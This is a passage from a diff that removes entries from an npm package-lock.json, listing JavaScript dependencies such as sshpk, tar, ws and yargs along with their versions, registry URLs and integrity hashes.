"sha512-5l4VyZR86LZ/lDxZTR6jqL8AFE2S0IFLMP26AbjsLVADxHdhB/c0GUsH+y39UfCi3dzz8OlQuPmnaJOMoDHQBA==", - "dev": true, - "funding": [ - { - "type": "github", - "url": "https://github.com/sponsors/feross" - }, - { - "type": "patreon", - "url": "https://www.patreon.com/feross" - }, - { - "type": "consulting", - "url": "https://feross.org/support" - } - ], - "peer": true, - "dependencies": { - "queue-microtask": "^1.2.2" - } - }, - "node_modules/safe-buffer": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz", - "integrity": "sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==", - "funding": [ - { - "type": "github", - "url": "https://github.com/sponsors/feross" - }, - { - "type": "patreon", - "url": "https://www.patreon.com/feross" - }, - { - "type": "consulting", - "url": "https://feross.org/support" - } - ] - }, - "node_modules/safer-buffer": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", - "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" - }, - "node_modules/semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - } - }, - "node_modules/shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "dependencies": { - "shebang-regex": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", - "engines": { - "node": ">=8" - } - }, - "node_modules/signal-exit": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", - "dev": true - }, - "node_modules/sisteransi": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", - "dev": true - }, - "node_modules/slash": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", - "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/source-map": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/source-map-support": { - "version": "0.5.13", - "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", - "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", - "dev": true, - "dependencies": { - "buffer-from": "^1.0.0", - "source-map": "^0.6.0" - } - }, - "node_modules/sprintf-js": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==", - "dev": true - }, - "node_modules/sshpk": { - "version": "1.17.0", - "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.17.0.tgz", - "integrity": "sha512-/9HIEs1ZXGhSPE8X6Ccm7Nam1z8KcoCqPdI7ecm1N33EzAetWahvQWVqLZtaZQ+IDKX4IyA2o0gBzqIMkAagHQ==", - "dependencies": { - "asn1": "~0.2.3", - "assert-plus": "^1.0.0", - "bcrypt-pbkdf": "^1.0.0", - "dashdash": "^1.12.0", - "ecc-jsbn": "~0.1.1", - "getpass": "^0.1.1", - "jsbn": "~0.1.0", - "safer-buffer": "^2.0.2", - "tweetnacl": "~0.14.0" - }, - "bin": { - "sshpk-conv": "bin/sshpk-conv", - "sshpk-sign": "bin/sshpk-sign", - "sshpk-verify": "bin/sshpk-verify" - }, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/stack-utils": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", - "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", - "dev": true, - "dependencies": { - "escape-string-regexp": "^2.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/stack-utils/node_modules/escape-string-regexp": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/stream-buffers": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.2.tgz", - "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==", - "engines": { - "node": ">= 0.10.0" - } - }, - "node_modules/string-length": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", - "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", - "dev": true, - "dependencies": { - "char-regex": "^1.0.2", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dependencies": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/string-width-cjs": { - "name": "string-width", - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dependencies": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dependencies": { - "ansi-regex": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-ansi-cjs": { - "name": "strip-ansi", - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dependencies": { - "ansi-regex": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-bom": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-final-newline": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/strip-json-comments": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", - "dev": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/supports-color": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", - "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/supports-preserve-symlinks-flag": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", - "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", - "dev": true, - "engines": { - "node": ">= 0.4" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/tar": { - "version": "7.4.3", - "resolved": "https://registry.npmjs.org/tar/-/tar-7.4.3.tgz", - "integrity": "sha512-5S7Va8hKfV7W5U6g3aYxXmlPoZVAwUMy9AOKyF2fVuZa2UD3qZjg578OrLRt8PcNN1PleVaL/5/yYATNL0ICUw==", - "dependencies": { - "@isaacs/fs-minipass": "^4.0.0", - "chownr": "^3.0.0", - "minipass": "^7.1.2", - "minizlib": "^3.0.1", - "mkdirp": "^3.0.1", - "yallist": "^5.0.0" - }, - "engines": { - "node": ">=18" - } - }, - "node_modules/tar/node_modules/yallist": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-5.0.0.tgz", - "integrity": "sha512-YgvUTfwqyc7UXVMrB+SImsVYSmTS8X/tSrtdNZMImM+n7+QTriRXyXim0mBrTXNeqzVF0KWGgHPeiyViFFrNDw==", - "engines": { - "node": ">=18" - } - }, - "node_modules/test-exclude": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", - "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", - "dev": true, - "dependencies": { - "@istanbuljs/schema": "^0.1.2", - "glob": "^7.1.4", - "minimatch": "^3.0.4" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/text-table": { - "version": "0.2.0", - "resolved": "https://registry.npmjs.org/text-table/-/text-table-0.2.0.tgz", - "integrity": "sha512-N+8UisAXDGk8PFXP4HAzVR9nbfmVJ3zYLAWiTIoqC5v5isinhr+r5uaO8+7r3BMfuNIufIsA7RdpVgacC2cSpw==", - "dev": true, - "peer": true - }, - "node_modules/throat": { - "version": "6.0.2", - "resolved": "https://registry.npmjs.org/throat/-/throat-6.0.2.tgz", - "integrity": "sha512-WKexMoJj3vEuK0yFEapj8y64V0A6xcuPuK9Gt1d0R+dzCSJc0lHqQytAbSB4cDAK0dWh4T0E2ETkoLE2WZ41OQ==", - "dev": true - }, - "node_modules/tmpl": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", - "dev": true - }, - "node_modules/to-regex-range": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", - "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", - "dev": true, - "dependencies": { - "is-number": "^7.0.0" - }, - "engines": { - "node": ">=8.0" - } - }, - "node_modules/tough-cookie": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", - "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", - "dependencies": { - "psl": "^1.1.28", - "punycode": "^2.1.1" - }, - "engines": { - "node": ">=0.8" - } - }, - "node_modules/tslib": { - "version": "2.4.1", - "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.4.1.tgz", - "integrity": "sha512-tGyy4dAjRIEwI7BzsB0lynWgOpfqjUdq91XXAlIWD2OwKBH7oCl/GZG/HT4BOHrTlPMOASlMQ7veyTqpmRcrNA==" - }, - "node_modules/tunnel-agent": { - "version": "0.6.0", - "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", - "integrity": "sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", - "dependencies": { - "safe-buffer": "^5.0.1" - }, - "engines": { - "node": "*" - } - }, - "node_modules/tweetnacl": { - "version": "0.14.5", - "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", - "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==" - }, - "node_modules/type-check": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/type-check/-/type-check-0.4.0.tgz", - "integrity": "sha512-XleUoc9uwGXqjWwXaUTZAmzMcFZ5858QA2vvx1Ur5xIcixXIP+8LnFDgRplU30us6teqdlskFfu+ae4K79Ooew==", - "dev": true, - "peer": true, - "dependencies": { - "prelude-ls": "^1.2.1" - }, - "engines": { - "node": ">= 0.8.0" - } - }, - "node_modules/type-detect": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/type-fest": { - "version": "0.20.2", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.20.2.tgz", - "integrity": "sha512-Ne+eE4r0/iWnpAxD852z3A+N0Bt5RN//NjJwRd2VFHEmrywxf5vsZlh4R6lixl6B+wz/8d+maTSAkN1FIkI3LQ==", - "dev": true, - "peer": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/undici-types": { - "version": "6.20.0", - "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.20.0.tgz", - "integrity": "sha512-Ny6QZ2Nju20vw1SRHe3d9jVu6gJ+4e3+MMpqu7pqE5HT6WsTSlce++GQmK5UXS8mzV8DSYHrQH+Xrf2jVcuKNg==", - "dev": true - }, - "node_modules/update-browserslist-db": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.1.1.tgz", - "integrity": "sha512-R8UzCaa9Az+38REPiJ1tXlImTJXlVfgHZsglwBD/k6nj76ctsH1E3q4doGrukiLQd3sGQYu56r5+lo5r94l29A==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/browserslist" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ], - "dependencies": { - "escalade": "^3.2.0", - "picocolors": "^1.1.0" - }, - "bin": { - "update-browserslist-db": "cli.js" - }, - "peerDependencies": { - "browserslist": ">= 4.21.0" - } - }, - "node_modules/uri-js": { - "version": "4.4.1", - "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", - "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", - "dependencies": { - "punycode": "^2.1.0" - } - }, - "node_modules/uuid": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", - "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", - "deprecated": "Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. See https://v8.dev/blog/math-random for details.", - "bin": { - "uuid": "bin/uuid" - } - }, - "node_modules/v8-to-istanbul": { - "version": "9.3.0", - "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.3.0.tgz", - "integrity": "sha512-kiGUalWN+rgBJ/1OHZsBtU4rXZOfj/7rKQxULKlIzwzQSvMJUUNgPwJEEh7gU6xEVxC0ahoOBvN2YI8GH6FNgA==", - "dev": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.12", - "@types/istanbul-lib-coverage": "^2.0.1", - "convert-source-map": "^2.0.0" - }, - "engines": { - "node": ">=10.12.0" - } - }, - "node_modules/verror": { - "version": "1.10.0", - "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", - "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", - "engines": [ - "node >=0.6.0" - ], - "dependencies": { - "assert-plus": "^1.0.0", - "core-util-is": "1.0.2", - "extsprintf": "^1.2.0" - } - }, - "node_modules/walker": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", - "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", - "dev": true, - "dependencies": { - "makeerror": "1.0.12" - } - }, - "node_modules/which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "dependencies": { - "isexe": "^2.0.0" - }, - "bin": { - "node-which": "bin/node-which" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dev": true, - "dependencies": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/wrap-ansi?sponsor=1" - } - }, - "node_modules/wrap-ansi-cjs": { - "name": "wrap-ansi", - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dependencies": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/wrap-ansi?sponsor=1" - } - }, - "node_modules/wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", - "dev": true - }, - "node_modules/write-file-atomic": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-4.0.2.tgz", - "integrity": "sha512-7KxauUdBmSdWnmpaGFg+ppNjKF8uNLry8LyzjauQDOVONfFLNKrKvQOxZ/VuTIcS/gge/YNahf5RIIQWTSarlg==", - "dev": true, - "dependencies": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || >=16.0.0" - } - }, - "node_modules/ws": { - "version": "8.18.0", - "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.0.tgz", - "integrity": "sha512-8VbfWfHLbbwu3+N6OKsOMpBdT4kXPDDB9cJk2bJ6mh9ucxdlnNvH1e+roYkKmN9Nxw2yjz7VzeO9oOz2zJ04Pw==", - "engines": { - "node": ">=10.0.0" - }, - "peerDependencies": { - "bufferutil": "^4.0.1", - "utf-8-validate": ">=5.0.2" - }, - "peerDependenciesMeta": { - "bufferutil": { - "optional": true - }, - "utf-8-validate": { - "optional": true - } - } - }, - "node_modules/y18n": { - "version": "5.0.8", - "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/yallist": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", - "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", - "dev": true - }, - "node_modules/yaml": { - "version": "1.10.2", - "resolved": "https://registry.npmjs.org/yaml/-/yaml-1.10.2.tgz", - "integrity": "sha512-r3vXyErRCYJ7wg28yvBY5VSoAF8ZvlcW9/BwUzEtUsjvX/DKs24dIkuwjtuprwJJHsbyUbLApepYTR1BN4uHrg==", - "dev": true, - "engines": { - "node": ">= 6" - } - }, - "node_modules/yargs": { - "version": "17.7.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", - "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", - "dev": true, - "dependencies": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "dev": true, - "engines": { - "node": ">=12" - } - }, - "node_modules/yocto-queue": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - } - }, - "dependencies": { - "@aashutoshrathi/word-wrap": { - "version": "1.2.6", - "resolved": "https://registry.npmjs.org/@aashutoshrathi/word-wrap/-/word-wrap-1.2.6.tgz", - "integrity": "sha512-1Yjs2SvM8TflER/OD3cOjhWWOZb58A2t7wpE2S9XfBYTiIl+XFhQG2bjy4Pu1I+EAlCNUzRDYDdFwFYUKvXcIA==", - "dev": true, - "peer": true - }, - "@ampproject/remapping": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.3.0.tgz", - "integrity": "sha512-30iZtAPgz+LTIYoeivqYo853f02jBYSd5uGnGpkFV0M3xOt9aN73erkgYAmZU43x4VfqcnLxW9Kpg3R5LC4YYw==", - "dev": true, - "requires": { - "@jridgewell/gen-mapping": "^0.3.5", - "@jridgewell/trace-mapping": "^0.3.24" - } - }, - "@babel/code-frame": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.26.2.tgz", - "integrity": "sha512-RJlIHRueQgwWitWgF8OdFYGZX328Ax5BCemNGlqHfplnRT9ESi8JkFlvaVYbS+UubVY6dpv87Fs2u5M29iNFVQ==", - "dev": true, - "requires": { - "@babel/helper-validator-identifier": "^7.25.9", - "js-tokens": "^4.0.0", - "picocolors": "^1.0.0" - } - }, - "@babel/compat-data": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.26.2.tgz", - "integrity": "sha512-Z0WgzSEa+aUcdiJuCIqgujCshpMWgUpgOxXotrYPSA53hA3qopNaqcJpyr0hVb1FeWdnqFA35/fUtXgBK8srQg==", - "dev": true - }, - "@babel/core": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.26.0.tgz", - "integrity": "sha512-i1SLeK+DzNnQ3LL/CswPCa/E5u4lh1k6IAEphON8F+cXt0t9euTshDru0q7/IqMa1PMPz5RnHuHscF8/ZJsStg==", - "dev": true, - "requires": { - "@ampproject/remapping": "^2.2.0", - "@babel/code-frame": "^7.26.0", - "@babel/generator": "^7.26.0", - "@babel/helper-compilation-targets": "^7.25.9", - "@babel/helper-module-transforms": "^7.26.0", - "@babel/helpers": "^7.26.0", - "@babel/parser": "^7.26.0", - "@babel/template": "^7.25.9", - "@babel/traverse": "^7.25.9", - "@babel/types": "^7.26.0", - "convert-source-map": "^2.0.0", - "debug": "^4.1.0", - "gensync": "^1.0.0-beta.2", - "json5": "^2.2.3", - "semver": "^6.3.1" - } - }, - "@babel/generator": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.26.2.tgz", - "integrity": "sha512-zevQbhbau95nkoxSq3f/DC/SC+EEOUZd3DYqfSkMhY2/wfSeaHV1Ew4vk8e+x8lja31IbyuUa2uQ3JONqKbysw==", - "dev": true, - "requires": { - "@babel/parser": "^7.26.2", - "@babel/types": "^7.26.0", - "@jridgewell/gen-mapping": "^0.3.5", - "@jridgewell/trace-mapping": "^0.3.25", - "jsesc": "^3.0.2" - } - }, - "@babel/helper-compilation-targets": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.25.9.tgz", - "integrity": "sha512-j9Db8Suy6yV/VHa4qzrj9yZfZxhLWQdVnRlXxmKLYlhWUVB1sB2G5sxuWYXk/whHD9iW76PmNzxZ4UCnTQTVEQ==", - "dev": true, - "requires": { - "@babel/compat-data": "^7.25.9", - "@babel/helper-validator-option": "^7.25.9", - "browserslist": "^4.24.0", - "lru-cache": "^5.1.1", - "semver": "^6.3.1" - } - }, - "@babel/helper-module-imports": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.25.9.tgz", - "integrity": 